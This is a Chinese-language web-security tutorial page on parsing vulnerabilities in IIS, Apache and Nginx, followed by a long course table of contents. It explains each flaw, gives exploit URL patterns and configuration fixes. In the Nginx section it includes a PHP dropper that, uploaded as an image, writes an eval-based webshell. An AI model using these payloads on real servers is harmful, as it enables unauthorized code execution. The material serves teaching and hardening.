[TOC]
## web中間件解析漏洞
常見的web中間為IIS,NGING,APACHE三個
### 一、IIS5.x-6.x解析漏洞:
使用iis5.x-6.x版本的服務器,大多為windows server 2003,網站比較古老,開發語句一般為asp;該解析漏洞也只能解析asp文件,而不能解析aspx文件。
#### 漏洞簡介
1. 目錄解析(6.0)
形式:www.xxx.com/xx.asp/xx.jpg
原理:服務器默認會把.asp,.asa目錄下的文件都解析成asp文件。
2. 文件解析
形式:www.xxx.com/xx.asp;.jpg
原理:服務器默認不解析;號后面的內容,因此xx.asp;.jpg便被解析成asp文件了。
3. 解析文件類型
IIS6.0默認的可執行文件除了asp還包含這三種 :/test.asa、/test.cer、/test.cdx
#### 修復方案
1. 無微軟官方的補丁,可自己編寫正則,阻止上傳xx.asp;.jpg類型的文件名。
2. 做好權限設置,限制用戶創建文件夾**
### 二、IIS7.5解析漏洞:
漏洞的出現幾率相當小
漏洞原理:
IIS7.5的漏洞與nginx的類似,都是由于php配置文件中,開啟了`cgi.fix_pathinfo`,而這并不是nginx或者iis7.5本身的漏洞。
> 開啟IIS功能可以參考:https://www.xp.cn/a.php/182.html
當安裝完成后,php.ini里如果默認`cgi.fix_pathinfo=1`,就會將后綴名為.php的路徑當做php文件進行解析。
```url
#原url
http://x.x.x.x/upload/webshell.jpg
#改造后
http://x.x.x.x/upload/webshell.jpg/.php
```
### 三、apache解析漏洞:
#### 漏洞簡介
1. 漏洞原理:
Apache解析文件的規則是從右到左開始判斷解析,如果后綴名為不可識別文件解析,就再往左判斷。
比如`test.php.owf.rar`,“.owf”和”.rar” 這兩種后綴是apache不可識別解析,apache就會把oldboy.php.owf.rar解析成php。
2. 漏洞形式
www.xxxx.xxx.com/test.php.php123
3. 其余配置問題導致漏洞
(1)如果配置有`AddHandler php5-script .php`,這時只要文件名里包含.php,如test2.php.jpg,也會以php來執行。
(2)如果配置有`AddType application/x-httpd-php .jpg` 即使擴展名是.jpg,一樣能以 php 方式執行。
#### 修復方案:
1. apache配置文件,禁止.php這樣的文件執行
```cmd
<Files ~ “.(php.|php3.)”>
????????Order Allow,Deny
????????Deny from all
</Files>
```
2. 用偽靜態重寫類似.php.\*這類文件,
在httpd.conf找到`LoadModule rewrite_module modules/mod_rewrite.so`,把注釋去掉
重啟apache,在網站根目錄建立.htaccess文件,代碼如下:
```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .(php.|php3.) /index.php
RewriteRule .(pHp.|pHp3.) /index.php
RewriteRule .(phP.|phP3.) /index.php
RewriteRule .(Php.|Php3.) /index.php
RewriteRule .(PHp.|PHp3.) /index.php
RewriteRule .(PhP.|PhP3.) /index.php
RewriteRule .(pHP.|pHP3.) /index.php
RewriteRule .(PHP.|PHP3.) /index.php
</IfModule>
```
### 四、nginx解析漏洞:
#### 漏洞簡介
1. 漏洞原理:
Nginx默認是以 CGI 的方式支持 PHP 解析的,普遍的做法是在 Nginx 配置文件中通過正則匹配設置`SCRIPT_FILENAME`,然后將`SCRIPT_FILENAME`傳遞給 PHP CGI
假如有url:www.xx.com/phpinfo.jpg/1.php,匹配到的SCRIPT_FILENAME應該是1.php,如果開啟了`fix_pathinfo`參數,那么就會觸發在 PHP中的如下邏輯:
PHP認為`SCRIPT_FILENAME`是phpinfo.jpg,而1.php是`PATH_INFO`,所以就會將phpinfo.jpg作為 PHP 文件來解析了。
2. 漏洞形式:
```url
www.xxxx.com/UploadFiles/image/1.jpg/1.php
www.xxxx.com/UploadFiles/image/1.jpg%00.php
www.xxxx.com/UploadFiles/image/1.jpg/%20\\0.php
xxx.jpg%00.php (Nginx <8.03空字節代碼執行漏洞)
```
3. 另外一種手法:
上傳一個名字為test.jpg,以下內容的文件。
```php
<?PHP fputs(fopen('shell.php','w'),'<?php eval($\_POST\[cmd\])?>');?>
```
然后訪問/test.jpg/.php,在這個目錄下就會生成一句話木馬shell.php
#### 修復方案
1. 修改php.ini文件,將`cgi.fix_pathinfo`的值設置為0;
2. 在Nginx配置文件中添加以下代碼:
```
if?( $fastcgi_script_name?~ ..*/.*php ) {
return?403;
}
```
這行代碼的意思是當匹配到類似test.jpg/a.php的URL時,將返回403錯誤代碼。**
- src導航站
- kali和msf
- 信息收集
- 收集域名信息
- Whois 查詢
- 備案信息查詢
- 信用信息查詢
- IP反查站點的站
- 瀏覽器插件
- 收集子域名信息
- 在線平臺
- 工具枚舉
- ssl與證書透明度
- DNS歷史解析
- DNS域傳送漏洞
- C段探測
- JS文件域名&ip探測
- 搜索引擎&情報社區
- google黑客
- 威脅情報
- 鐘馗之眼
- 收集相關應用信息
- 微信公眾號&微博
- APP收集&反編譯
- 收集常用端口信息
- 常見端口&解析&總結
- 掃描工具
- 網絡空間引擎搜索
- 瀏覽器插件
- nmap掃描
- 收集敏感信息
- 源碼泄露
- 郵箱信息收集
- 備份文件泄露
- 目錄&后臺掃描
- 公網網盤
- 歷史資產
- 指紋&WAF&CDN識別
- 指紋識別
- CDN識別
- 繞過CDN查找真實IP
- WAF識別
- 漏洞資源和社工
- 漏洞公共資源庫
- 社會工程
- 資產梳理
- 各種對滲透有幫助的平臺
- 掃描器
- 掃描器對比
- AppScan(IBM)_web和系統
- AWVS_web掃描
- X-Scan_系統掃描
- WebInspect_HP_WEB
- Netsparker_web
- WVSS_綠盟_web
- 安恒明鑒
- Nessus_系統
- nexpose_系統
- 啟明天鏡_web_系統
- SQL注入
- 常用函數
- sql注入步驟
- union注入和information_schema庫
- 函數和報錯注入
- SQL盲注
- 其他注入方式
- 防止SQL注入解決方案
- Access數據庫注入
- MSSQL數據庫注入
- MYSQL數據庫注入
- 神器SQLmap
- xss跨站腳本攻擊
- xss原理和分類
- xss案例和修復
- xss繞過技巧
- xss案例
- 文件上傳下載包含
- 常有用文件路徑
- 文件上傳漏洞
- 文件下載漏洞
- 文件包含漏洞
- upload-labs上傳漏洞練習
- XXE、SSRF、CSRF
- SSRF原理基礎
- SSRF案例實戰
- CSRF原理基礎
- CSRF案例及防范
- XXE之XML_DTD基礎
- XXE之payload與修復
- XXE結合SSRF
- 遠程命令執行與反序列化
- 遠程命令和代碼執行漏洞
- 反序列化漏洞
- 驗證碼與暴力破解
- 爆破與驗證碼原理
- CS架構暴力破解
- BS架構暴力破解
- WEB編輯器漏洞
- 編輯器漏洞基礎
- Ewebeditor編輯器
- FCKeditor編輯器
- 其他編輯器
- web中間件漏洞
- 中間件解析漏洞
- Tomcat常見的漏洞總結
- Jboss漏洞利用總結
- Weblogic漏洞利用總結
- WEB具體步驟
- 旁注和越權
- CDN繞過
- 越權與邏輯漏洞
- WEB應用常見其他漏洞
- WEB登陸頁面滲透思路
- 獲取WEBshell思路
- 社工、釣魚、apt
- 社工和信息收集
- 域名欺騙
- 釣魚郵件
- 一些釣魚用的掛馬工具
- 代碼審計
- 代碼審計工具
- WAF繞過
- WAF基礎及云WAF
- 各種WAF繞過方法
- 繞過WAF上傳文件
- 系統提權
- windows系統提權
- linux系統提權
- 數據庫提權操作系統
- 內網橫向滲透
- 內網穿透方式
- 一些內網第三方應用提權
- ARP與DOS
- ARP欺騙
- DOS與DDOS
- 一些DOS工具